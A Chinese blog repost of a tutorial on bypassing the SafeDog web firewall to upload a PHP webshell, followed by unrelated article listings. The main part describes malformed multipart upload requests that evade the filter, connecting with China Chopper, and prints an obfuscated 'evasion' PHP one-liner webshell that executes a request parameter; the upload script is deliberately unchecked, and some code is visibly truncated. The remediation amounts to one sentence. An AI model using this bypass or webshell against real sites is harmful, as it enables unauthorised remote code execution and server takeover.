php网站安全狗绕过,绕过网站安全狗拦截,上传Webshell技巧总结 | 附免杀PHP一句话...

news/2024/5/20 15:31:02/文章来源:https://blog.csdn.net/weixin_34377697/article/details/115411207

原标题:绕过网站安全狗拦截,上传Webshell技巧总结 | 附免杀PHP一句话

*本文原创作者:1_2,本文属FreeBuf原创奖励计划,未经许可禁止转载

这篇文章我介绍一下我所知道的绕过网站安全狗上传WebShell的方法。

思路是:修改HTTP请求,构成畸形HTTP请求,然后绕过网站安全狗的检测。

废话不多说,切入正题。。。。

1、实验环境:

Windows Server 2003、 Apache/2.4.18、PHP/5.3.29、网站安全狗(Apache版)V3.5.12048

2、用于文件上传的PHP源码:

$path = dirname(__FILE__) . '/upload/';

$rand = rand(0,30);

move_uploaded_file($_FILES["file"]["tmp_name"],$path . $rand . $_FILES["file"]["name"]);

echo "File Path:" . $path . $rand . $_FILES["file"]["name"] . "
";

echo "OK";

?>

因为此次实验的目的是绕过网站安全狗,所以PHP源码上我没做任何检测,把上传的文件直接放在upload目录下。

3、先看一下正常的HTTP请求:

96fb7ec7008f01ff486fd942726af615.png

很明显,文件名为”yijuhua.php”被拦截。。。。

4、尝试%00截断:

e87c7c007255b3174462b139500094cc.png

很明显,失败了。。。

5、修改HTTP请求,构造畸形HTTP请求

(1)删除实体里面的Conten-Type字段:

c7601cf155200145a4ef669a4f8f23bd.png

f0a56ed644d34768198753fad772920f.png

绕过网站安全狗的拦截,成功上传WebShell。。。

(2)删除Content-Disposition字段里的空格:

8859ef99f8467f90851a4fae4bf653b0.png

1c0bb6e7909ee0463fb3d2a35453a971.png

abfbd8c6319b3f764dd41230f7ece4ec.png

(3)修改Content-Disposition字段值的大小写:

21d6b3b57879c5ec41814afdf69bd0aa.png

6、菜刀连接一句话:

2538364724f3bb724b6ecdab6501bb64.png

到此,上传WebShell结束,各位看明白了吗?

7、免杀PHP一句话:

/*

PHP一句话木马

assert($string)

*/

$arr = array('a','s','s','e','r','t');

$func = '';

for($i=0;$i

$func .= $func . $arr[$i];

}

$func($_REQUEST['c']);

?>

4c441eb1492e14eb397e3315240045c0.png

8、修复漏洞:

出现这种情况,我认为是网站安全狗在开发时没有考虑到畸形HTTP请求,而Apache却兼容畸形HTTP请求,所以能够上传成功。

*本文原创作者:1_2(QQ:965207103),本文属FreeBuf原创奖励计划,未经许可禁止转载返回搜狐,查看更多

责任编辑:

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.luyixian.cn/news_show_846831.aspx

如若内容造成侵权/违法违规/事实不符,请联系dt猫网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

百度关键词抓取工具_SEO:想提升关键词排名?你还缺一份seo优化大全

文 | 公关之家 作者:Leon360kSEO工具是网站进行搜索引擎优化过程中提升工作效能与准确性的多种辅助程序。这些工具与优化者者的智慧若用于积极方向,将会为网站的优化提供较大的助力,尤其是使用先进算法的工具会为优化者们更准确的决策参考与指…

ngrok内网穿透映射使用与注册 让外网访问你的网站

一、ngrok安装,使用与注册 1、先打开ngrok注册页面www.ngrok.com,进入sign up 后,发现注册报错,无法正常注册; 2、我们再打开一个界面www.github.com,点击注册,这次可以成功,注意再…

大型网站架构之分布式消息队列

以下是消息队列以下的大纲,本文主要介绍消息队列概述,消息队列应用场景和消息中间件示例(电商,日志系统)。 本次分享大纲 消息队列概述消息队列应用场景消息中间件示例JMS消息服务常用消息队列参考(推荐&a…

网站架构第一篇

Web发展历程 CS时代:富客户端方案。卖软件可以赚钱。 QQ,影音,游戏 Web 1.0时代:主要是单向信息的发布。互联网内容是由少数编辑人员定制的,用户只有看的权限 三大门户网站:新浪、网易、搜狐。 Web 2.0时代…

python 3 爬取某小说网站小说,注释详细

目标:每一个小说保存成一个txt文件 思路:获取每个小说地址(图一),进入后获取每章节地址(图二),然后进入获取该章节内容(图三)保存文件中。循环 效果图&#…

如何用自己电脑做服务器,绑定域名建一个个人网站

使用自己的电脑,下载一个tomcat服务器,并将域名解析到本机,这样就可以发布自己的网站了。不过,关机之后网站便登不上去了。这样做只是为了我们可以更好的开发调试自己的工程,网站上线之后可以让更多的朋友帮你找bug。这…

Android 学习论坛博客及网站推荐

一、博客推荐 1)http://blog.csdn.net/android_tutor(Android开发入门基础,高级进阶) 2)http://blog.csdn.net/hellogv(入门与提高,很多例子值得学习) 3)http://www.c…

【2019.6.11可用】chrome提示“无法添加来自此网站的应用、扩展程序和应用脚本”的解决办法

目前亲测可行的方法有两种,个人推荐第一种。 第一种方法(推荐) 1、在chrome上右键,打开属性。 在目标里添加参数“ --enable-easy-off-store-extension-install”。注意--前加上一个空格 2、【重启浏览器!】打开chr…

猪八戒学做网站之HTML5篇(2):编写网页的工具

一杯清茶还没有喝完,小朱告诉我,他的网页做完了,惊得我下巴都快掉了。 我张大着嘴巴来到小朱的电脑前,看到了他完成的网页,完成情况好像还不错。各位可以看一下,他的网页的完成效果: 说实话&…

猪八戒学做网站之HTML5篇(3):网页不是图片

一大早,被手机的闹铃吵醒。自从做了程序员之后,天天都感觉睡不醒。脑力劳动和体力劳动真不一样,体力劳动累了之后,睡一觉起来就什么事也没有了。而脑力劳动之后,怎么睡都睡不醒。说什么三十年前睡不醒,三十…

猪八戒学做网站之HTML5篇(5):Hello HTML

出了几天差,回来一看,猪八戒正在网上津津有味地看着什么呢。 猪八戒看见我回来了,马上站了起来:“师父,你回来啦!”一边说还一边接过我的行李包。 我把行李包递给猪八戒后问他:“我不在的这几天…

猪八戒学做网站之HTML5篇(6):标签!标签!

“师父,你在看什么呢?” “《南京!南京!》。”我头也不回地回答道。 “那我应该看什么呢?”猪八戒又问。 “标签!标签!”我还是头也没回地回答道。 “啥?”猪八戒一下子没有明白过来…

在VS2008中创建自定义控件(一)创建网站项目和自定义控件项目

本文目的: 1、创建一个创建网站项目。 2、创建一个自定义控件项目。 下文目的: 1、创建一个自定义控件。 2、将自定义控件添加到工具箱中,以便调用。 这两篇博文的最终结果如下图所示。 首先声明,用户控件和自定义控件是不同…

python从网站抓取特定内容

背景 测试需要模拟浏览器的userAgent,从网站上找到一批 http://www.fynas.com/ua 分析 非常普通的table元素维护 约有8K多条,为防止中途中断导致数据丢失选择读取一页写一页,单个文件可能吃力,选择100页数据放入一个文件的方式…

网站集成第三方登录--QQ

网站平台集成第三方登录--QQ 注:仅适用于线上测试,不提供本地测试(供新手参考)第一步:1、 登陆QQ互联开放平台首页 http://connect.qq.com/ ,注册开发者信息2、 选择菜单栏“管理中心”创建应用-网站3、 填…

网站集成第三方登录--sina

网站平台集成第三方登录--sina 注&#xff1a;仅适用于线上测试&#xff0c;不提供本地测试&#xff08;供新手参考&#xff09;第一步&#xff1a;1、 登陆新浪微博开放平台首页 http://open.weibo.com/ &#xff0c;登录后编辑开发者信息 及身份认证2、 开始创建应用 并将<…

iframe引入的网站不能全屏宽度有滚动条_程序猿进阶不能错过的最全前端性能优化秘籍(一)!...

很多人通常在完成了产品之后才会去考虑性能。把与性能相关的事情拖到项目的最后来做&#xff0c;所做的也不过是对服务器上的config文件进行一些微调、串联、优化以及部分特别小的调整。而现在&#xff0c;技术已经有了翻天覆地的变化。一个项目的性能是非常重要的&#xff0c;…

linux网络方面命令大全,网络操作命令 - Linux常用命令大全_Linux教程_Linux公社-Linux系统门户网站...

网络操作命令命令功能命令功能ftp传送文件telnet远端登陆bye结束连线并结束程序rlogin远端登入ping检测主机netstat显示网络状态8.1 ftp命令ftp命令用来传输文件&#xff0c;非常重要。如果在网络上看到一个很重要的文件&#xff0c;就可以用这个命令把那个文件传到自己的机器上…

如何将静态网站挂在github上

github.page是一个免费的静态托管服务&#xff0c;我们可以将静态网站托管在github上。具体的方法如下&#xff1a; 在github中新建一个username.github.io的公开仓库。&#xff08;username必须和你的github账户名完全一致。&#xff09;如果有静态网站的制作经验&#xff0c…

利用Lucene.net搭建站内搜索(4)---数据检索

前面的文章&#xff0c;我们已经对要检索的数据创建了索引&#xff0c;现在要做的就是为用户提供全文搜索的功能。通过Lucene我们还可以简单而高效地对搜索结果进行访问。此文和大家简单的说说利用Lucene.net进行数据的搜索。当我们查询Lucene的一个索引时&#xff0c;Lucene会…